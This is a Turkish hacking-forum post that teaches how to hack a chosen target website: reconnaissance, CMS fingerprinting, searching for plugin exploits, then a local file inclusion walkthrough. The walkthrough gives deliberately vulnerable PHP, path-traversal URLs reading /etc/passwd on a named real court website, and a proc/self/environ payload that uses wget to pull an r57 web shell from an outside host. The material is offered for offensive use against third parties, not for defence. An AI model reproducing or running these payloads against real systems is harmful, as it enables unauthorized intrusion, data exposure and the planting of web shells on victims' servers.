Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.



Site Açığı Bulma Yöntemleri // 2019

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 08-03-2019 22:13   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Nereden
AZ,Lenkeran
Mesajlar
Konular

Teşekkür (Etti): 20
Teşekkür (Aldı): 35


Post Site Açığı Bulma Yöntemleri // 2019



Merhabalar Bugun sizlere hedef site nasil hacklenir, nasil acik aranir, nasil analiz edilir hepsini anlatmaya calisagim. Ilk önce hedef sitemizi secip bilgi toplamamiz lazim
Bilgi den kastim ; whois, sunucu tarama, sitenin scripti, Sunucu daki baska siteden hedef’e dalma, Acik arama ve shell sokmak. (Toplanma Konudur)

Whois
Who.is sitesine girip, whois cekebilirsin boylece site hanki hosta barindigini, kime ait oldugunu ögrenebiliriz.

Site : http://www.who.is


Sunucu tarama
Sunucu tarama bize hedef sitede acik bulamazsak eger, sunucudan bir sitenin acigindan yararlarak servere girmemizi saglariz, boylece istedigimiz hedefe ulasabilirsiniz.
Sunucu taramasi nasil yapilir ?
Bunun icin lookup siteleri vardir veya PHP ile kodlanmis scriptler veya Toolar mevcuttur.
Tool(rar icinde mevcuttur)



Sitenin scripti nedir ? Hanki script kullaniliyor? Nasil anlarim ?

Ilk once url de en önemli kisma bakmamiz lazim, Aceba Sitenin dosya uzantilari nedir ? .php , .asp, .aspx Boylece ilk goruste sitenin yazilim dilini ogreniriz. [PHP ile kodlanmis, veya asp, veya aspx…]
Bazi insanlar siteye girdiginde direk anlar site hanki script kurulu oldugunu..(hack deneyimden kaynaklaniyordur illaki)
Simdi diyelim arayuzu tanimadik ilk once Footer bakariz eger footer da Powered by Wordpress yazarsa, veya Powered by Joomla, Powered by Seditio, vs Powered by xxx sitenin scripti’dir.



Eger footer’da herhangi gibi birsey powered by xxx yazmazsa, kaynak kodunu goruntuleriz.
Kaynak kodlarindan sitenin scriptini nasil anlarim ?
Wordpress de -> http://www.hedefsite.com/wp-content/...loads/isko.jpg
Gibi wp-contents wordpress ‘in dosya yollarindan biridir… yani sitenin wordpress oldugu anlarim (burdaki olay wordpress’in dosyalarini tanimaniz lazim veya diger scriptlerin... )
Olay eger joomla deilse, wordpress deilse cotonti, seditio deilse baska hanki scriptler var diye aklinizda soru isareti varsa, bunu tek cozumu kaynak kodlarindan /dosyayolu/dosyayolu/
su kisimlari kopyalayip google e yapisitirip aratmaniz lazim. Böylece indexlenmis olan dosya yolari size scriptin ismini daha cabuk bulmanizda fayda edecektir ve boylelikle hemen exploit aramanizi hizlandirmis olacaksiniz.

Hedef sitemizin whois cektik, Sunucudaki siteleri cektik, Sitenin hanki script oldugunu ogrendik sira geldi sitenin acigini aramaya.

Hedef sitede acik nasil ararim ?

Hedef sitede acigi scriptine gore arariz, yazilim diline, kodlarina gore arama yapariz.

Örnek veriyorum ;: wordpress tabanli bir sitemiz var , o wordpress surumune gore exploitlara bakarim, kaynak kodlarinda eklentiler bile cikar, o eklentilere gore exploit ararim , exploit kullanimi zor deildir.
Aynisi joomla, seditio, cotonti gibi scriptlere de gecerlidir.

exploit nasil ararim ?

Wordpress.com/plugins/exploitsiolanplug/xskod/..

Burdaki olay exploitsiolanplug nine gore exploit aramak

Google => exploitsiolanplug exploit
Google => inurl: exploitsiolanplug exploit

Böylece size kullanmis oldugu pluginlerin exploitleri mevcutmu deilmi diye aramanizi saglar.
Unutmayin sadece pluginde acik yoktur,

Yöntemler :

Upload acigi olabilir

SQL injection acigi

RFI acigi

Lfi acigi

Admin yolunu bulup sifre kirma olabilir bunlar hepsi sitede acik arama kategorisine girer.

//

Örnekler

LFI Acigi

LFI acigi olusturmasi


index.php dosyası:

Code:
<?php
include($_GET['sayfa'])
?>
index.php?sayfa=../../../../../../../../../etc/passwd


Ornek :

Sitesi : http://www.belmontcountyjuvenilecourt.com/index2.php

X-Bug Browser by isko tool ile sana url de girmen gerekenleri secip bug basman yeterli olcaktir, toolsuzda olur tabi

Komutlar basit

http://www.belmontcountyjuvenilecour.../../etc/passwd

Code:
Warning: include(includes/../../etc/passwd) [function.include]: failed to open stream: No such file or directory in/home/costinejuv/www/index2.php on line64
Diye hata aldik

Devam ediyoruz


http://www.belmontcountyjuvenilecour.../../etc/passwd

Yine ayni hatayi aldik

Devam ediyoruz

http://www.belmontcountyjuvenilecour.../../etc/passwd

Ve passwd listesi geldi

Bukadar basit arkadaslar…

Burda onemli olan lfi acigindan shell yuklemeniz ve daha kolay hacklemeniz olcaktir

Kodumuz

proc/self/environ%00&cmd=wget https://shelladresi.com/r57.txt-Oshell.php

olarak girip shelli yuklememiz lazim (unutmayin bu her lfi de yaramayabilir verdigim ornek sitede yaramadi.)



___________________________________________


🇹🇷 Hilalim Yıldızım Hiç Bitmeyen Sevdadır Canım Feda Olsun Sen Dalgalan Bayrağım 🇹🇷

 Offline  
 
Alıntı ile Cevapla
Teşekkür

'Rookie Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Siber Güvenlik
Pomeranian Boo
instagram takipci hilesi

wau